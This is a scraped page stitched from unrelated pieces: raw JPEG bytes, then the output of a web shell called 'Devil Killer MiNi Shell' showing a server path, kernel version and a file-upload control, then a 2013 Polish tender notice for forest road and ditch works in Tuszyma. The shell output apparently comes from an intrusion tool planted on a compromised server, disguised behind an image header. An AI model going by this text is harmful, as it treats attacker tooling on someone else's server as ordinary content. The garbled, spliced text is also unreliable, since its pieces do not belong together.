JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130724/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130724/292312-N-2013.html

<p class="kh_header"><b>Tuszyma: Wykonanie robót budowlanych obejmujących:
1. Remont szlaków zrywkowych na terenie Nadleśnictwa Tuszyma.
2. Odmulenie rowów przydrożnych dróg leśnych.
3. Wykonanie ścianek czołowych przepustu w Leśnictwie Ruda.</b><br>
<b>Numer ogłoszenia: 292312 - 2013; data zamieszczenia: 24.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Tuszyma , Tuszyma 147, 39-321 Tuszyma, tel. (0-17) 5813111.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.krosno.lasy.gov.pl/web/tuszyma</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Lesne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych obejmujących:
1. Remont szlaków zrywkowych na terenie Nadleśnictwa Tuszyma.
2. Odmulenie rowów przydrożnych dróg leśnych.
3. Wykonanie ścianek czołowych przepustu w Leśnictwie Ruda..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest wykonanie robót budowlanych 
1. Remont szlaków zrywkowych na terenie Nadleśnictwa Tuszyma
2. Odmulenie rowów przydrożnych dróg leśnych po ulewnych deszczach.
3. Wykonanie ścianek czołowych przepustu w Leśnictwie Ruda;
 i polegających na:

Zadanie 1. Remont szlaków zrywkowych na terenie Nadleśnictwa Tuszyma
Przedmiotem zamówienia jest wykonanie prac związanych z remontem szlaków zrywkowych 
w Leśnictwach Nadleśnictwa polegających na:

1. Leśnictwo Przecław - oddz. 90f
- wykonanie przepustu  fi 60 cm długości 12m  z rur PCV D600 SN8 -   wykonanie wykopu pod przepust, wykonanie podłoża z materiałów sypkich-kruszywa łamanego gr. 20cm 12x1 , ułożenie rur PCV o SN8, zasypanie wykopu z zagęszczeniem mechanicznym ubijakami, wykonanie podbudowy- warstwy dolnej z kruszyw łamanych gr. 20 cm 12x1,0+2*0,7, wykonanie ścianek czołowych 
z darniny przy  wykonanym  przepuście,
 -  wyrównanie podłoża i utwardzenie nawierzchni szlaku zrywkowego kruszywem łamanym  
o uziarnieniu 31,5/63 na powierzchni   400m2 i  grubości 15cm 400x0,15.
2. Leśnictwo Goleszów  - oddz. 85l, 85b, 
 - wykonanie przepustów fi 60 cm długości  6m  z rur PCV D600 SN8 - szt. 2 wykonanie wykopów pod przepusty, wykonanie podłoża z materiałów sypkich-kruszywa łamanego gr. 20cm 6x1x2 , ułożenie rur PCV o SN8, zasypanie wykopów z zagęszczeniem mechanicznym ubijakami, wykonanie podbudowy- warstwy dolnej z kruszyw łamanych gr. 20 cm  6x1,0+2x0,7x2, wykonanie ścianek czołowych z darniny przy wykonanych przepustach
- oddz. 85l, 85b,, 73c, 51b - wyrównanie podłoża i utwardzenie nawierzchni szlaku zrywkowego kruszywem łamanym  o uziarnieniu 31,5/63 na powierzchni   400m2  i  grubości 15cm 400x0,15.

3.Leśnictwo Piątkowiec - oddz.11, 14,  21, 40
- wykonanie przepustów fi 60 cm długości  6m  z rur PCV D600 SN8 - szt. 4  wykonanie wykopów pod przepusty, wykonanie podłoża z materiałów sypkich-kruszywa łamanego gr. 20cm 6x1x4 , ułożenie rur PCV o SN8, zasypanie wykopów z zagęszczeniem mechanicznym ubijakami, wykonanie podbudowy- warstwy dolnej z kruszyw łamanych gr. 20 cm 6x1,0+2x0,7x4, wykonanie ścianek czołowych z darniny przy wykonanych przepustach,
- wyrównanie podłoża i utwardzenie nawierzchni szlaku zrywkowego kruszywem łamanym  
o uziarnieniu 31,5/63 na powierzchni  510m2  i  grubości 15cm 510x0,15
- odtworzenie rowów odwadniających o wymiarach szer. górą 180 cm, szer. dna 50 cm, głębokości 100cm na  długości 250 m .

4. Leśnictwo Wojsław - oddz. 37
 - wyrównanie podłoża i utwardzenie nawierzchni szlaku zrywkowego kruszywem łamanym
 o uziarnieniu 31,5/63 na długości 500m 1500m2 i  grubości 15cm 500x3x0,15.

5. Leśnictwo Ruda -  oddz. 127c, 137f, 164
- wykonanie przepustów fi 60 cm długości  8 i 5m  z rur PCV D600 SN8 - szt. 2 wykonanie wykopów pod przepusty, wykonanie podłoża z materiałów sypkich-kruszywa łamanego gr. 20cm 8+5x1, ułożenie rur PCV o SN8, zasypanie wykopów z zagęszczeniem mechanicznym ubijakami, wykonanie podbudowy- warstwy dolnej z kruszyw łamanych gr. 20 cm ( 8+5x1,0+2x0,7, wykonanie ścianek czołowych z darniny przy wykonanych przepustach,
- wyrównanie podłoża i utwardzenie nawierzchni szlaku zrywkowego kruszywem łamanym  o uziarnieniu 31,5/63 na powierzchni  1050m2 i  grubości 15cm 1050x0,15)

6. Leśnictwo Sokole -  oddz. 218
- wykonanie przepustu  fi 60 cm długości 6m  z rur PCV D600 SN8 -  wykonanie wykopu pod przepust, wykonanie podłoża z materiałów sypkich-kruszywa łamanego gr. 20cm 6x1 , ułożenie rur PCV o SN8, zasypanie wykopu z zagęszczeniem mechanicznym ubijakami, wykonanie podbudowy- warstwy dolnej z kruszyw łamanych gr. 20 cm 6x1,0+2x0,7, wykonanie ścianek czołowych z darniny przy wykonanych przepustach,
- wyrównanie podłoża i utwardzenie nawierzchni szlaku zrywkowego kruszywem łamanym  o uziarnieniu 31,5/63 na powierzchni  900m2 i  grubości 15cm 900x0,15.

7. Leśnictwo Niwiska - oddz. 225
- wykonanie przepustu  fi 60 cm długości 6m  z rur PCV D600 SN8 - szt. 2  -  wykonanie wykopu pod przepust, wykonanie podłoża z materiałów sypkich-kruszywa łamanego gr. 20cm 6+6x1 , ułożenie rur PCV o SN8, zasypanie wykopu z zagęszczeniem mechanicznym ubijakami, wykonanie podbudowy- warstwy dolnej z kruszyw łamanych gr. 20 cm 6+6x1,0+2x0,7, wykonanie ścianek czołowych z darniny przy wykonanych przepustach,
-  wyrównanie podłoża i utwardzenie nawierzchni szlaku zrywkowego kruszywem łamanym  o uziarnieniu 31,5/63 na powierzchni 600m2  i  grubości 15cm 600x0,15.

Zadanie 2. Odmulenie rowów przydrożnych dróg leśnych po ulewnych deszczach.
Przedmiotem zamówienia jest wykonanie odmulenia i naprawy rowów, odtworzenie nasypów i poboczy dróg leśnych, udrożnienie i odmulenie przepustów wraz z uzupełnieniem wyrw materiałem pozyskanym z odmulenia, a w razie jego braku materiałem dowiezionym. Zakres prac obejmuje:
- Mechaniczne oczyszczenie rowów koparką z wyprofilowaniem dna i skarp z namułu o śr. gr. 20 cm z nadaniem rowom spadków, wbudowaniem gruntu w wyerodowane pobocza, zagęszczeniem poboczy, a nadmiar gruntu rozplantować za przeciwskarpą przyjęto 40% uszkodzenia rowów
- Ręczne formowanie nasypów z gruntu kat. I-II ułożonego wzdłuż nasypu grunt z odmulenia rowów - zasypanie wyrw w skarpie rowów i poboczy przyjęto 20% uszkodzenia
Zagęszczenie zasypów z gruntu sypkiego kat I-II ubijakami mechanicznymi - współczynnik zagęszczenia Js=0,96
- Uzupełnienie nasypów i odmulenie rowu w obrębie przepustu, odmulenie i udrożnienie rur przepustu, uzupełnienie i zagęszczenie warstwy podbudowy korony drogi o grubości 0,20 m na szerokości przepustu tłuczniem o uziarnieniu 0,4-63 mm w miejscach powstałych wyrw. 
Obmiar robót dotyczy 1mb rowu wraz z poboczem i przeciwskarpą po jednej stronie drogi, wraz z istniejącymi na drodze przepustami i zjazdami. 
Przewidywany rozmiar prac wynosi 120 000 mb rowów. 
Odbiór będzie polegał na pomiarze długości w mb odtworzonych i wyremontowanych rowów przy drogach leśnych, nasypów i poboczy wraz z przepustami - na gotowo. 
Wykonawca ma podać stawkę za 1mb odmulenia i naprawy rowów oraz cenę brutto za całość zamówienia.

Zadanie 3. Wykonanie ścianek czołowych przepustu w Leśnictwie Ruda.
Wykonanie ścianek czołowych przepustu okularowego fi 80 na drodze leśnej 222/677 w Leśnictwie Ruda - zakres prac:
- Tymczasowe przeprowadzenie wody rurami PCV wraz z wykonaniem grobli ziemnej oraz ich demontaż - obmiar 18 m
- Wykopy oraz przekopy o głęb. do 3.0 m wykonane na odkład koparkami przedsiębiernymi o poj. łyżki 0,25 - 0,60m3 w gruncie kategorii I-II - obmiar 2x4,40x0,40x0,60 = 2,112 m3
- Obudowy wlotów (wylotów) przepustów drogowych rurowych - obmiar 2x 4,40x0,40x0,60+ 3,34x1,87x0,25-3,13x0,80x0,80x0,25x0,25 + 3,34x0,20x0,12] = 5,145 m3. Ścianki czołowe zbrojone prefabrykowane lub wykonane na miejscu. 
- Uzupełnienie nasypów i odmulenie rowu w obrębie przepustu, odmulenie i udrożnienie rur przepustu, uzupełnienie i zagęszczenie warstwy podbudowy korony drogi o grubości 0,20 m na szerokości przepustu tłuczniem o uziarnieniu 0,4-63 mm..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówienia uzupełniającego do wysokości 50 % zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-1, 45.11.21.00-6, 45.23.31.40-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium. 
10.1.	Wykonawca składający ofertę jest zobowiązany do wniesienia wadium w wysokości :
4 000,00 PLN (słownie: cztery tysiące złotych) - część 1. Remont szlaków zrywkowych na terenie Nadleśnictwa Tuszyma.
2 500,00 PLN (słownie:  dwa tysiące pięćset złotych) - część 2. Odmulenie rowów przydrożnych dróg leśnych.
Nie wymaga się - część 3. Wykonanie ścianek czołowych przepustu w Leśnictwie Ruda.

10.2.	Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku spośród następujących form, w zależności od wyboru Wykonawcy:
1)	pieniądzu, przelewem na rachunek bankowy Zamawiającego w PKO BP O/Mielec na numer konta 10 1020 4913 0000 9402 0010 3580. W przypadku wnoszenia wadium w formie pieniężnej, za skuteczne jego wniesienie należy uznać sytuację, kiedy uznanie na rachunku bankowym zamawiającego następuje przed upływem terminu składania ofert.
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
10.3.	Wadium musi obejmować cały okres związania ofertą, tj. począwszy od dnia, w którym upływa termin składania ofert do co najmniej ostatniego dnia związania ofertą włącznie.
10.4.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
10.5.	W przypadku, gdy wadium wnoszone jest w innej formie niż pieniądz, Wykonawca powinien załączyć do oferty oryginał gwarancji lub poręczenia w sposób umożliwiający ich zwrot zgodnie z Ustawą (np. w oddzielnej kopercie dołączonej od oferty). Z treści gwarancji powinno wynikać, że gwarant zobowiązuje się do zapłaty kwoty wadium bezwarunkowo, nieodwołalnie i na pierwsze pisemne żądanie beneficjenta (zamawiającego). Treść gwarancji musi przesądzać o tym, że zamawiający nie może mieć żadnych trudności z uzyskaniem od gwaranta kwoty wadium, jeżeli tylko spełni warunki formalne związane z żądaniem zapłaty kwoty wadium. 
	Złożenie gwarancji wadialnej, w której gwarant nie zobowiązuje się jednoznacznie do zapłaty kwoty wadium w każdym przypadku określonym w Ustawie, będzie skutkować wykluczeniem wykonawcy z postępowania.
10.6.	W razie wnoszenia wadium w formie pieniężnej w tytule przelewu należy umieścić następującą informację: Wykonanie robót budowlanych obejmujących:
1. Remont szlaków zrywkowych na terenie Nadleśnictwa Tuszyma.
2. Odmulenie rowów przydrożnych dróg leśnych.
3. Wykonanie ścianek czołowych przepustu w Leśnictwie Ruda.
- nr postępowania ZG-2710-15/13.

10.7.	Wykonawca, który nie wniesie wadium w wysokości określonej w pkt 10.1., w formie lub formach, o których mowa w pkt 10.2., zostanie wykluczony z postępowania.
10.8.	Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 10.13.
10.9.	Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
10.10.	Zamawiający zwróci niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
10.11.	Zamawiający żądać będzie ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt 10.8., jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca winien wnieść wadium w terminie określonym przez Zamawiającego.
10.12.	Jeżeli wadium wniesiono w pieniądzu Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
10.13.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie w trybie art. 26 ust. 3 Ustawy, nie złoży wymaganych oświadczeń lub dokumentów, lub pełnomocnictw o którym mowa w pkt 12.3., chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
10.14.	Wykonawca, którego oferta zostanie wybrana utraci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku, gdy:
1)	odmówi podpisania umowy w sprawie niniejszego zamówienia na warunkach określonych w ofercie;
2)	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie niniejszego zamówienia stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, w zakresie określonym przez Zamawiającego w niniejszym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, w zakresie określonym przez Zamawiającego w niniejszym postępowaniu, tj. warunki dotyczące:posiadania wiedzy i doświadczenia, tzn. że wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3  roboty budowlane o wartości każdej roboty nie mniejszej niż: 
dla zadania 1 : 50 000 PLN brutto,  polegające na budowie szlaków zrywkowych lub dróg leśnych gruntowych, lub dróg leśnych o nawierzchni bardziej zaawansowanej technicznie, na kwotę min. 50 000 PLN każda.
 
dla zadania 2 : 50 000 PLN brutto, polegającej na wykonaniu odmulania, odtwarzania lub budowy przydrożnych rowów melioracyjnych. 

dla zadania 3 : 10 000 PLN brutto, polegających na wykonaniu prac o podobnym charakterze.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, w zakresie określonym przez Zamawiającego w niniejszym postępowaniu, tj. warunki dotyczące dysponowania potencjałem technicznym, tzn. że dysponują (lub będą dysponować) co najmniej następującymi maszynami, urządzeniami i pojazdami: 
Dla zadania 1: 
- koparka lub koparko-ładowarka o poj. łyżki min 0,25 m3 - 1 szt.
- samochód ciężarowy lub inny pojazd o ładowności min 10 t - 1 szt.

Dla zadania 2: 
- koparka lub koparko-ładowarka o poj. łyżki min 0,25 m3 - 1 szt.
- samochód ciężarowy o ładowności min. 3,5 t - 1 szt.
- ubijarka typu skoczek - 1 szt.
- ubijarka płytowa - 1 szt.

Dla zadania 3: 
- koparka lub koparko-ładowarka o poj. łyżki min 0,25 m3 - 1 szt.
- samochód ciężarowy o ładowności min 3,5 t - 1 szt.
- ubijarka typu skoczek - 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, w zakresie określonym przez Zamawiającego w niniejszym postępowaniu, tj. warunki dotyczące
dysponowania osobami zdolnymi do wykonania zamówienia, tzn. że dysponują (lub będą dysponować) co najmniej: 
Dla zadania 1: 
1) 1 osobą posiadającą uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno - budowlanej drogowej zgodnie z art. 14 ust. 1 pkt 2a ustawy z dnia 7 lipca 1994 roku Prawo Budowlane,
2) - kierowca samochodu ciężarowego - co najmniej 1 osoba;
3) - operator koparki lub koparko - ładowarki - co najmniej 1 osoba;
 
4)  - wykwalifikowanych pracowników posiadającymi odpowiednie doświadczenie w zakresie wykonywania robót budowlanych - co najmniej 2 osoby.
Dla zadania 2: 
1) 1 osobą posiadającą uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno - budowlanej drogowej zgodnie z art. 14 ust. 1 pkt 2a ustawy z dnia 7 lipca 1994 roku Prawo Budowlane,
2) - kierowca samochodu ciężarowego - co najmniej 1 osoba;
3) - operator koparki lub koparko - ładowarki - co najmniej 1 osoba;
 4) - wykwalifikowanych pracowników posiadającymi odpowiednie doświadczenie w zakresie wykonywania robót budowlanych - co najmniej 2 osoby.
Dla zadania 3: 
1) 1 osobą posiadającą uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno - budowlanej drogowej zgodnie z art. 14 ust. 1 pkt 2a ustawy z dnia 7 lipca 1994 roku Prawo Budowlane,
2) - kierowca samochodu ciężarowego - co najmniej 1 osoba;
3) - operator koparki lub koparko - ładowarki - co najmniej 1 osoba;
 4) - wykwalifikowanych pracowników posiadającymi odpowiednie doświadczenie w zakresie wykonywania robót budowlanych - co najmniej 1 osoba.
Przez uprawnienia budowlane rozumie się uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, wydane na podstawie ustawy Prawo budowlane (j.t. Dz. U. z 2010 r. Nr 243, poz. 1623, ze zm.) oraz rozporządzenia Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83, poz. 578, ze zm.) lub odpowiadające im inne ważne uprawnienia budowlane wydane na mocy wcześniej obowiązujących przepisów i nadające takie same uprawnienia jak określone w pkt 6.2.2. ppkt 1).
W przypadku obywateli państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, a także innych - muszą oni spełniać wymogi określone w art. 12a ustawy Prawo budowlane, z których wynika, że samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, w zakresie określonym przez Zamawiającego w niniejszym postępowaniu, tj. warunki dotyczące
- sytuacji finansowej, tzn. że posiadają środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż: 
Dla zadania 1: 50 000,00 PLN,
Dla zadania 2: 50 000,00 PLN,
Dla zadania 3: 5 000,00 PLN.
W przypadku złożenia oferty na więcej niż jedną część zamówienia Wykonawca musi spełnić warunek przynajmniej dla jednej  części o najwyższych wymaganiach co do ilości posiadanych środków finansowych lub zdolności kredytowej

- sytuacji ekonomicznej, tzn. że posiadają: 
	ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia, na kwotę nie mniejszą niż: 
dla części nr 1 zamówienia - 100 000,00 PLN
dla części nr 2 zamówienia - 100 000,00 PLN
dla części nr 3 zamówienia - 10 000,00 PLN

W przypadku złożenia oferty na więcej niż jedną część zamówienia Wykonawca musi spełnić warunek przynajmniej dla jednej  części o najwyższych wymaganiach co do ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

